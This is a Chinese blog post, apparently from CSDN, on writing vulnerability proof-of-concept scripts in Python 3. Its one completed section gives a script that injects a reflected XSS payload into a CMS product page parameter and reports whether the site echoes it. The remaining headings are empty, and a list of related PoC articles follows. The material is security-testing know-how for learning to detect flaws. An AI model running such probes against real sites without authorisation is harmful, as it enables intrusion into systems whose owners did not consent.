python3编写不同类型漏洞的poc

最新推荐文章于 2023-10-03 20:39:46 发布
最新推荐文章于 2023-10-03 20:39:46 发布
阅读量858 收藏 6
点赞数 3
分类专栏: python 文章标签: python 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29443517/article/details/109471281
版权

python2 与python3使用的模块略有不同

1、反射型xss的poc,以骑士cms的反射型xss为例

# coding=utf-8

from urllib import request
import sys 
# https://blog.csdn.net/jiduochou963/article/details/87564467 
# http://www.onescorpion.com/research/poc.html
def xss_poc(url):
    target = url + r"/Product.asp?BigClassName=%C4%A5%BB%FA%3Cscript%3Ealert(1)%3C/script%3E&Smallclassname=%C1%A2%C4%A5"
    try:
        req = request.Request(target) # 发送请求
        result = request.urlopen(req).read()
        if b'<script>alert(1)</script>' in result:
            print("%s is vulnerable!" % url)
            print("payload:\n",target)
        else:
            print("%s is not vulnerable!"% url)
    except Exception as e:
        print('something is wrong..')
        print(e)

argvs = sys.argv
if len(argvs) == 2:
    url = argvs[1]
else:
    print('unsage: python %s url'% argvs[0])
xss_poc(url)

 poc验证结果:

2、存储型xss的poc

3、get方式SQL注入

4、post方式SQL注入

5、代码执行

6、文件上传

 

 

 

xstdys
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
37-4 用Python编写SQL注入的基于错误报告的POC
weixin_43263566的博客
04-22 147
SQL注入是一种常见的应用程序安全漏洞,发生在应用程序与数据库层之间。简而言之,它是通过在输入的字符串中注入SQL指令来实现的,如果程序设计不良未进行充分检查,那么这些注入的指令就可能被数据库服务器误认为是正常的SQL指令而被执行,导致数据泄露或系统被入侵。SQL注入漏洞的原理是在输入的数据中插入SQL代码,以利用应用程序对输入数据的不完善验证。对于分类中的每种类型,都需要针对性地设计相应的防御策略,并在代码编写和测试阶段进行充分的安全审查和测试。
python编写poc_Poc编写
weixin_39619635的博客
01-14 1133
0x01 PoCPoC(全称: Proof of Concept), 又叫概念验证。作为我们的漏洞验证程序,他可能是一段不完整的程序,仅仅是为了证明我们提出漏洞的观点。推荐使用Python编写PoC,因为安全界用 Python 的人居多,的东西能被更多人看懂,并且 Python 这门语言的灵活,类库强大等特性,给编写的人提供了很大便利。Exp(全称: Exploit),又叫漏洞利用程序。比如目标...
python traceback_干货分享丨Python从入门到编写POC之常用的标准库
weixin_39796149的博客
10-24 318
前期回顾>>Python介绍及安装使用Python从入门到编写POC之读文件Python从入门到编写POC之特殊函数Python从入门到编写POC系列文章是i春秋论坛作家「Exp1ore」表哥原创的一套完整教程,想系统学习Python技能的小伙伴,不要错过哦!公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。常用的标准库安装完Python之后,我们也同时获得了...
python注入漏洞poc
weixin_30552811的博客
04-30 405
webug靶场一道简单的注入题 加点后报错 could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line...
PythonPOC编写
qq_59923059的博客
08-15 1798
PythonPOC编写入门
Python3实现PoC——CVE-2014-6271
weixin_33831673的博客
12-18 315
一、演示一下CVE-2014-6271的利用效果二、代码+注释importrequests importargparse #获取参数 parser=argparse.ArgumentParser() parser.add_argument('-u',dest="url") args=parser.parse_args() url=args.url #...
PocList:python或go编写poc
04-04
描述中的 "PocList" 指的可能是一个集合或列表,包含了多种不同类型PoC,可能涵盖了多个软件、系统或协议的漏洞。由于使用了Python或Go这两种语言,我们可以推断这个项目旨在提供跨平台、高效或者易于理解和实现的...
心脏漏洞POC代码(Python2)
06-07
标题“心脏漏洞POC代码(Python2)”表明这是一个Proof-of-Concept(概念验证)代码,用于演示如何利用心脏漏洞。该代码基于Python2编写,可以帮助安全研究人员或渗透测试人员理解和检测心脏漏洞。 描述中提到的...
常见Exp漏洞POC集合
01-21
在本集合中,我们可以看到不同类型的Exploit,如"exp-363.py"和"exp-1666.py",这些可能是针对不同漏洞编号的Exploit代码,其中的数字可能对应CVE(Common Vulnerabilities and Exposures,通用漏洞披露)编号,...
Some-PoC-oR-ExP:各种漏洞poc、Exp的收集或编写
04-28
《各种漏洞PoC、Exp的收集与编写:深入理解与应用》 在网络安全领域,PoC(Proof of Concept)和Exp(Exploit)是两个重要的概念。PoC通常指的是概念验证,即证明某一安全漏洞确实存在的一种代码或方法,而Exp则是...
some_pocsuite:用于漏洞排查的pocsuite3验证POC代码
05-23
插件代码编写使用pocsuite3 漏洞测试框架,插件编写请参考 pocsuite3 项目插件编写要求。序号poc说明1hikvision-2013-4976_web_login-bypass.py海康威视cve-2013-4976匿名登录验证绕过2weblogic-vul-check_all_rce....
python编写poc_学习Pythonpoc其实没那么难
weixin_36084130的博客
01-14 647
现在,开始!0x00 前言今天刚刚把放到收藏夹准备看的,然后又看到题主的这个问题。顺便观摩了1楼大神的博客,我这种炒鸡新手表示很兴奋啊,阔以好好学习代码审计吖!但是萌妹子说了“不会开发的谈审计都是耍流氓!:)”。怎么办?? 我不会开发啊,我怎么学啊?????0x01 不会开发可以”抄”作为一个学渣,要考试的时候,总是把历年考题拿出来,别人题型怎么的,你就怎么套,不用去管他原理。就好比别人都叫三楼...
python编写poc,以DVWA-command_injection为例
最新发布
weixin_44248977的博客
10-03 155
一个简单的命令注入POC编写,用python实现,希望大佬们批评指正
python编写简单poc,验证dvwa靶场
记录日常学习
09-02 397
python编写简单poc练习,熟悉poc基本构造,以dvwa为例。
python编写poc_POC编写基础知识
weixin_29405101的博客
12-23 3337
什么是 PoCPoC(全称: Proof of Concept), 中文译作概念验证。在安全界,你可以理解成为漏洞验证程序,和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码什么是 ExpExp(全称: Exploit),中文叫漏洞利用程序。名字上说的已经很清楚了,简单讲,就是一段可以发挥漏洞价值的程序,这话感觉和没说一样。想象一下这样的场景,目标存在一个 SQL...
Python小练习】使用Python编写POC 脚本-上篇
慢就是快
09-13 505
Poc(全称: Proof Of Concept), 中文译作概念验证。在网络安全行业,理解为**漏洞验证程序,**类似于程序开发中的功能Demo,仅证明某功能或观点的可行性,一般不具备“破坏性”。Exp(全称: Exploit),中文叫译作漏洞利用程序,就是一段可以发挥漏洞价值的程序。比如SQL注入漏洞,运行Exp脚本可以通过漏洞获取数据库敏感数据内容或服务器权限。
chatgpt赋能pythonPythonPOC:提高网络安全攻防技能的利器
weixin_45566993的博客
06-02 505
POC是指为了验证某项功能是否存在或漏洞是否可被成功利用的一段代码。在网络安全领域中,POC通常被用于验证漏洞是否存在或者可被攻击者利用。POC可以用于漏洞发现过程中,攻击者通过编写和利用POC来寻找漏洞。同时,POC也可以用于漏洞修复过程中,安全研究人员或漏洞发现者利用POC来验证漏洞是否已经被修复。POC通常表示为一些脚本程序或者独立的应用程序。本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc。
学习Pythonpoc其实没那么难
adislj007的博客
04-04 9408
现在,开始! 0x00 前言 今天刚刚把http://drops.wooyun.org/tips/12751放到收藏夹准备看的,然后又看到题主的这个问题。顺便观摩了1楼大神的博客,我这种炒鸡新手表示很兴奋啊,阔以好好学习代码审计吖!但是萌妹子说了“不会开发的谈审计都是耍流氓!:)”。怎么办?? 我不会开发啊,我怎么学啊????? 0x01 不会开发可以”抄” 作为一个学渣,要考试的时候,总是把历年
python3 多线程批量验证POC模板
weixin_30341745的博客
09-10 452
#coding:utf-8 import threading,Queue,sys,os class RedisUN(threading.Thread): def __init__(self,queue): threading.Thread.__init__(self) self._queue = queue def run(...
python编写POC脚本
04-03
4. 编写 POC 脚本:将攻击代码转化为 POC(Proof of Concept)脚本,用于漏洞验证和漏洞报告。 5. 测试验证:在合适的环境中使用 POC 脚本进行漏洞验证,确保其能够成功利用漏洞。 6. 漏洞报告:如果成功验证了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值